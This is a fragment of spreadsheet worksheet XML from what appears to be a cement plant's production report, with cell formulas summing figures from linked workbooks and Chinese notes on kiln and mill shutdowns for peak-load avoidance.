        <f>'[14]11'!$N$21+'[14]11'!$N$22+'[14]11'!$N$35</f>
        <v>44.15</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'10'!U53</f>
        <v>557.59</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>38892.017</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]11'!$Q$21+'[14]11'!$Q$22+'[14]11'!$Q$35</f>
        <v>64</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'10'!X53</f>
        <v>627</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40118</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]11'!$T$21+'[14]11'!$T$22+'[14]11'!$T$35</f>
        <v>1579.537</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]11'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'10'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]11'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'10'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]11'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]11'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]11'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]11'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'10'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]11'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'10'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]11'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]11'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'10'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]11'!$I$63</f>
        <v>149.6</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'10'!K55</f>
        <v>1797.496</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>37233.146</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]11'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]11'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]11'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]11'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]11'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]11'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]11'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]11'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]11'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'10'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'10'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]11'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：10:00-22:10避峰停机；3#磨：大修续停；4#磨：8:00-22:20避峰停机。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G57+'10'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'10'!K57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G58+'10'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'10'!K58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G59+'10'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'10'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]11'!$Q$65</f>
        <v>窑:正常。A组磨：正常。D1#磨：正常，D2#磨：正常。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G60+'10'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'10'!K60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'[14]11'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]11'!$E$6</f>
        <v>3535</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'10'!H61</f>
        <v>39423</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1155296</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]11'!$E$21</f>
        <v>4078.29</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'10'!K61</f>
        <v>42979.22</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1144139.3</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]11'!$H$6</f>
        <v>34212.9499999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>65.7941346153844</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'[14]11'!$M$11+'[14]11'!$M$12+'[14]11'!$M$13+'[14]11'!$M$14+'[14]11'!$M$15+'[14]11'!$M$16+'[14]11'!$M$17+'[14]11'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]11'!$N$11+'[14]11'!$N$12+'[14]11'!$N$13+'[14]11'!$N$14+'[14]11'!$N$15+'[14]11'!$N$16+'[14]11'!$N$17+'[14]11'!$N$18</f>
        <v>2814</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'10'!H62</f>
        <v>27805</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>863798.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]11'!$Q$11+'[14]11'!$Q$12+'[14]11'!$Q$13+'[14]11'!$Q$14+'[14]11'!$Q$15+'[14]11'!$Q$16+'[14]11'!$Q$17+'[14]11'!$Q$18</f>
        <v>2643</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'10'!K62</f>
        <v>28385</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>862857.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]11'!$T$11+'[14]11'!$T$12+'[14]11'!$T$13+'[14]11'!$T$14+'[14]11'!$T$15+'[14]11'!$T$16+'[14]11'!$T$17+'[14]11'!$T$18</f>
        <v>17874.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>71.4985359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]11'!$Q$71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'[14]11'!$M$19+'[14]11'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]11'!$N$19+'[14]11'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'10'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]11'!$Q$19+'[14]11'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'10'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]11'!$T$19+'[14]11'!$T$20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G64+'10'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'10'!K64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G65+'10'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'10'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]11'!$Q$74</f>
        <v>1#窑:续停；2#窑:续停；1#磨:14:30-22:20库满停机。2#磨:6:00-22:30避峰停机。3#磨:6:00-22:20避峰停机。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G66+'10'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'10'!K66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G67+'10'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'10'!K67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'[15]11'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]11'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'10'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]11'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'10'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]11'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]11'!$Q$77</f>
        <v>1#磨10:00-22:15避峰停机:12.25小时(避峰)。2#磨11:00-22:00避峰停机:11小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]11'!$D$43+'[15]11'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]11'!$E$43+'[15]11'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'10'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]11'!$H$43+'[15]11'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'10'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]11'!$K$43+'[15]11'!$K$44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'[15]11'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]11'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'10'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]11'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'10'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]11'!$K$45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G71+'10'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'10'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]11'!$Q$80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G72+'10'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'10'!K72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G73+'10'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'10'!K73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G74+'10'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'10'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]11'!$Q$83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G75+'10'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'10'!K75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G76+'10'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'10'!K76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G77+'10'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'10'!K77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G78+'10'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'10'!K78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'[16]11'!$E$7</f>
        <v>675.26</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'10'!H79</f>
        <v>5928.2</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>153056.67</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]11'!$I$7</f>
        <v>514.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'10'!K79</f>
        <v>5706.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>147597.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]11'!$L$7</f>
        <v>5106.48</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>10.21296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'[16]11'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'10'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]11'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'10'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]11'!$Y$15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G81+'10'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'10'!K81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G82+'10'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'10'!K82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G83+'10'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'10'!K83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G84+'10'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'10'!K84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G85+'10'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'10'!K85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Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="E38"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12/31</f>
        <v>0.387096774193548</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46003</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20698.68</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'11'!H5</f>
        <v>254229.69</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6409095.72</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>22475.76</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'11'!K5</f>
        <v>274735.629</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6424806.76</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>246961.885</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>66.0325895721924</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]12'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]12'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]12'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]12'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]12'!$U$101</f>
        <v>80.196875</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]12'!$V$101</f>
        <v>65.2009393063584</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]12'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]12'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]12'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]12'!$D$23+'[11]12'!$D$17+'[12]12'!$D$17+'[13]12'!$D$25+'[14]12'!$D$8+'[14]12'!$D$15+'[15]12'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]12'!$E$23+'[11]12'!$E$17+'[12]12'!$E$17+'[13]12'!$E$25+'[14]12'!$E$8+'[14]12'!$E$15+'[15]12'!$E$7</f>
        <v>1076</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'11'!H6</f>
        <v>3183</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>279532.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]12'!$I$23+'[11]12'!$I$17+'[12]12'!$I$17+'[13]12'!$I$25+'[14]12'!$E$23+'[14]12'!$E$30+'[15]12'!$H$7</f>
        <v>740.02</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'11'!K6</f>
        <v>8420.87</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>270618.57</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]12'!$L$23+'[11]12'!$L$17+'[12]12'!$L$17+'[13]12'!$L$25+'[14]12'!$H$23+'[14]12'!$H$30+'[15]12'!$K$7</f>
        <v>26874.97</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]12'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]12'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]12'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]12'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]12'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]12'!$V$102</f>
        <v>34.2629937379576</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]12'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]12'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]12'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]12'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]12'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'11'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]12'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'11'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]12'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]12'!$W$107</f>
        <v>135.164835164835</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]12'!$X$107</f>
        <v>126.496557916791</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]12'!$Y$107</f>
        <v>131.653984047773</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]12'!$T$107</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]12'!$U$107</f>
        <v>46.4027777777778</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]12'!$V$107</f>
        <v>31.5398603082851</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]12'!$Q$107</f>
        <v>11.83</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]12'!$R$107</f>
        <v>133.64</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]12'!$S$107</f>
        <v>2619.07</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]12'!$D$27+'[11]12'!$D$18+'[13]12'!$D$26+'[14]12'!$D$10+'[14]12'!$D$17+'[15]12'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]12'!$E$27+'[11]12'!$E$18+'[13]12'!$E$26+'[14]12'!$E$10+'[14]12'!$E$17+'[15]12'!$E$9</f>
        <v>4051</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'11'!H8</f>
        <v>23369</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>548905.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]12'!$I$27+'[11]12'!$I$18+'[13]12'!$I$26+'[14]12'!$E$25+'[14]12'!$E$32+'[15]12'!$H$9</f>
        <v>2467.86</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'11'!K8</f>
        <v>30359.51</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>538104.22</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]12'!$L$27+'[11]12'!$L$18+'[13]12'!$L$26+'[14]12'!$H$25+'[14]12'!$H$32+'[15]12'!$K$9</f>
        <v>34889.39</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]12'!$W$108</f>
        <v>134.68667255075</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]12'!$X$108</f>
        <v>131.562385656787</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]12'!$Y$108</f>
        <v>127.666595243197</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]12'!$T$108</f>
        <v>47.2083333333333</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]12'!$U$108</f>
        <v>47.4479166666667</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]12'!$V$108</f>
        <v>28.1009152215799</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]12'!$Q$108</f>
        <v>11.33</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]12'!$R$108</f>
        <v>136.65</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]12'!$S$108</f>
        <v>2333.5</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]12'!$D$24+'[11]12'!$D$19+'[12]12'!$D$20+'[13]12'!$D$27+'[14]12'!$D$11+'[14]12'!$D$18+'[15]12'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
